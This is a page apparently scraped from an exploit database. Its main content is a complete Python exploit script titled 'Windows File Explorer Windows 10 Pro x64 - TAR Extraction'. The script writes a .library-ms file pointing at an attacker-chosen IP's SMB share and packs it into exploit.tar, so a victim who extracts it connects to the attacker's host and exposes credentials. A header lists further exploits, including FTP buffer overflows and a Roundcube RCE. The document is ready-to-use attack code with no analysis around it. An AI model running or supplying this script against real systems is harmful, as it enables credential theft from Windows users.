
7 changes to exploits/shellcodes/ghdb Freefloat FTP Server 1.0 - Remote Buffer Overflow Roundcube 1.6.10 - Remote Code Execution (RCE) Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) PCMan FTP Server 2.0.7 - Remote Buffer Overflow Windows File Explorer Windows 10 Pro x64 - TAR Extraction
34 lines
No EOL
939 B
Python
Executable file
34 lines
No EOL
939 B
Python
Executable file
import os
|
|
import tarfile
|
|
|
|
def main():
|
|
file_name = input("Enter your file name: ")
|
|
ip_address = input("Enter IP (EX: 192.168.1.162): ")
|
|
|
|
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
|
|
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
|
|
<searchConnectorDescriptionList>
|
|
<searchConnectorDescription>
|
|
<simpleLocation>
|
|
<url>\\\\{ip_address}\\IT</url>
|
|
</simpleLocation>
|
|
</searchConnectorDescription>
|
|
</searchConnectorDescriptionList>
|
|
</libraryDescription>
|
|
"""
|
|
|
|
library_file_name = f"{file_name}.library-ms"
|
|
with open(library_file_name, "w", encoding="utf-8") as f:
|
|
f.write(library_content)
|
|
|
|
tar_name = "exploit.tar"
|
|
with tarfile.open(tar_name, "w") as tarf:
|
|
tarf.add(library_file_name)
|
|
|
|
if os.path.exists(library_file_name):
|
|
os.remove(library_file_name)
|
|
|
|
print("completed")
|
|
|
|
if __name__ == "__main__":
|
|
main() |